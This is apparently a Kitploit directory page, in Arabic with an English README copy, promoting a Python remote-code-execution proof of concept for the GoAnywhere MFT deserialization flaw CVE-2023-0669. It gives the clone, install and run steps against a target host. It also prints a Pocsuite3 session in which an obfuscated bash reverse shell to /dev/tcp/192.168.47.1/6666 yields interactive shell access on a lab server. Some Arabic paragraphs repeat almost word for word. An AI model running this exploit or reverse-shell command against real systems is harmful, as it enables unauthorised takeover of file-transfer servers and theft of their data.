Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-0669 — GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet ثغرات إلغاء التسلسل Python RCE PoC(إثبات المفهوم) | Kitploit
أدوات/GitHubGitHub/avento/cve-2023-0669
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةتطوير الحمولات
GitHubavento/cve-2023-0669

CVE-2023-0669

GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet ثغرات إلغاء التسلسل Python RCE PoC(إثبات المفهوم)

عرض المستودع
83منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-0669 GoAnywhere MFT إلغاء تسلسل - مدونة Je Yiuwai

CVE-2023-0669

CVE-2023-0669 هي ثغرة في إلغاء تسلسل GoAnywhere MFT، تنشأ عند إلغاء تسلسل كائن يتحكم فيه المهاجم، مما يؤدي إلى وجود ثغرة حقن أوامر قبل المصادقة في License Response Servlet. يمكن للمهاجم استغلال هذه الثغرة لتنفيذ أكواد عشوائية على النظام المتأثر، مما يؤدي إلى السيطرة الكاملة على النظام. تؤثر الثغرة على الإصدارات السابقة للإصدار 7.1.2، ولا تشمل 7.1.2.

CVE-2023-0669 هي ثغرة إلغاء تسلسل في GoAnywhere MFT توجد في License Response Servlet بسبب ثغرة حقن أوامر قبل المصادقة تسمح للمهاجم بتنفيذ أكواد عشوائية على النظام المتأثر عن طريق إلغاء تسلسل كائن يتحكم فيه المهاجم. تؤثر الثغرة على الإصدارات السابقة للإصدار 7.1.2.

تشكل هذه الثغرة تهديدًا خطيرًا لأمان برنامج نقل الملفات على مستوى المؤسسات GoAnywhere MFT، حيث يمكن للمهاجم استغلالها لسرقة البيانات الحساسة، أو التلاعب بالبيانات، أو تعطيل النظام. لذلك، يجب على المستخدمين اتخاذ إجراءات فورية لحماية أمان أنظمتهم.

يشكل الثغرة تهديدًا خطيرًا لأمان برنامج نقل الملفات على مستوى المؤسسات GoAnywhere MFT، حيث يمكن للمهاجم استغلالها لسرقة البيانات الحساسة، والتلاعب بالبيانات، واختراق الأنظمة. لذلك، يجب على المستخدمين اتخاذ إجراءات فورية لحماية أنظمتهم.

تم إصدار إعلان أمان رسمي، وتم توفير طرق فحص أولية. يمكن للمستخدمين التحقق مما إذا كانت أنظمتهم متأثرة بالثغرة من خلال البحث عن سلاسل محددة في سجل userdata/logs. إذا تعذر تطبيق التصحيحات، يُنصح باتخاذ إجراءات أمان أخرى لحماية النظام.

تم إصدار الإعلان الأمني الرسمي، وتم توفير طرق الفحص الأولية. يمكن للمستخدمين التحقق مما إذا كانت أنظمتهم متأثرة بالثغرة من خلال البحث عن سلاسل محددة في سجل userdata/logs. إذا تعذر تطبيق التصحيحات، يُنصح باتخاذ إجراءات أمان أخرى لحماية النظام.

باختصار، CVE-2023-0669 هي ثغرة إلغاء تسلسل تتطلب اهتمام المستخدمين. يجب على المستخدمين التحديث إلى أحدث إصدار فورًا والتحقق مما إذا كانت أنظمتهم متأثرة بالثغرة. بالإضافة إلى ذلك، يُنصح بتعزيز إدارة أمان البرامج على مستوى المؤسسات مثل GoAnywhere MFT واتخاذ إجراءات أمان متعددة الطبقات لحماية أنظمتهم.

باختصار، CVE-2023-0669 هي ثغرة إلغاء تسلسل تتطلب اهتمام المستخدمين. يحتاج المستخدمون إلى التحديث إلى أحدث إصدار فورًا والتحقق مما إذا كانت أنظمتهم متأثرة بالثغرة. بالإضافة إلى ذلك، يُنصح بتعزيز إدارة أمان البرامج على مستوى المؤسسات مثل GoAnywhere MFT واتخاذ إجراءات أمان متعددة الطبقات لحماية أنظمتهم.

CVE-2023-0669 PoC

مقدمة

هذا الاستغلال هو سكريبت بلغة Python يُستخدم لاستغلال الثغرة CVE-2023-0669 في GoAnywhere MFT الإصدار 6.7.9594 والإصدارات الأقدم.

وصف الثغرة

توجد هذه الثغرة بسبب مشكلة أمان في معالجة طلبات Bundle المشفرة في GoAnywhere MFT. يمكن للمهاجم إرسال طلب مصمم خصيصًا لتنفيذ أكواد عشوائية على الخادم الهدف.

طريقة الاستخدام

  1. استنساخ هذا المستودع:
root@kitploit:~
git clone https://github.com/Avento/CVE-2023-0669.git
  1. الدخول إلى المجلد:
root@kitploit:~
cd CVE-2023-0669
  1. تثبيت مكتبات التبعية requests و cryptography:
root@kitploit:~
pip install requests cryptography
  1. تشغيل الاستغلال:
root@kitploit:~
python CVE-2023-0669.py --host <عنوان IP الهدف>

ملاحظات

  • يتطلب تشغيل هذا الاستغلال حقوق وصول قانونية ولا ينبغي استخدامه لأغراض غير قانونية.
  • نظرًا لأن تنفيذ هذا الاستغلال يشكل خطرًا على الخادم الهدف، فإن المستخدم هو المسؤول الوحيد عن مخاطره وعواقبه.

Introduction

This Exploit is a Python script used to exploit the vulnerability CVE-2023-0669 in GoAnywhere MFT v6.7.9594 and earlier versions.

Vulnerability Description

This vulnerability exists because of a security issue in processing encrypted Bundle requests in GoAnywhere MFT. An attacker can send a specially crafted request to execute arbitrary code on the target server.

Usage

  1. Clone this repository.
root@kitploit:~
git clone https://github.com/Avento/CVE-2023-0669.git
  1. Enter the directory.
root@kitploit:~
cd CVE-2023-0669
  1. Install the dependencies of requests and cryptography.
root@kitploit:~
pip install requests cryptography
  1. Run the Exploit.
root@kitploit:~
python CVE-2023-0669.py --host <target IP>

Note

  • Running this Exploit requires legal access rights and should not be used for illegal purposes.
  • As the execution of this Exploit poses a risk to the target server, the user is solely responsible for its risks and consequences.

RCE

root@kitploit:~
$ python3 CVE-2023-0669.py --host 192.168.47.179:8000
Exploit Success ~

Pocsuite3

root@kitploit:~
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > check
[11:10:53] [INFO] pocsusite got a total of 1 tasks
[11:10:53] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
[11:10:53] [+] Version : 7.0.3
[11:10:53] [INFO] Scan completed,ready to print

+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
| target-url                 |                           poc-name                           |     poc-id    |   component    |         version          |  status |
----------+---------+
| http://192.168.47.179:8000 | CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet إلغاء تسلسل | CVE-2023-0669 | GoAnywhere MFT | قبل 7.1.2، وليس بما في ذلك 7.1.2 | نجاح |
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
success : 1 / 1
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > shell
[11:11:55] [INFO] pocsusite got a total of 1 tasks
[11:11:55] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
/bin/bash -c bash$IFS-i$IFS>&$IFS/dev/tcp/192.168.47.1/6666<&1
[11:11:55] [*] listening on 0.0.0.0:6666
[11:11:56] [+] new connection established from 192.168.47.179
[11:11:56] [INFO] Scan completed,ready to print
[11:11:56] [INFO] connect back ip: 192.168.47.1    port: 6666
[11:11:56] [INFO] watting for shell connect to pocsuite
Now Connected: 192.168.47.179
SHELL (192.168.47.179) > id
bash: cannot set terminal process group (20029): Inappropriate ioctl for device
bash: no job control in this shell
ubuntu@ubuntu:~/HelpSystems/GoAnywhere$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)

المؤلف: Je Yiuwai تم التحرير بواسطة xiaomi pad 6 pro

تنزيل الأداة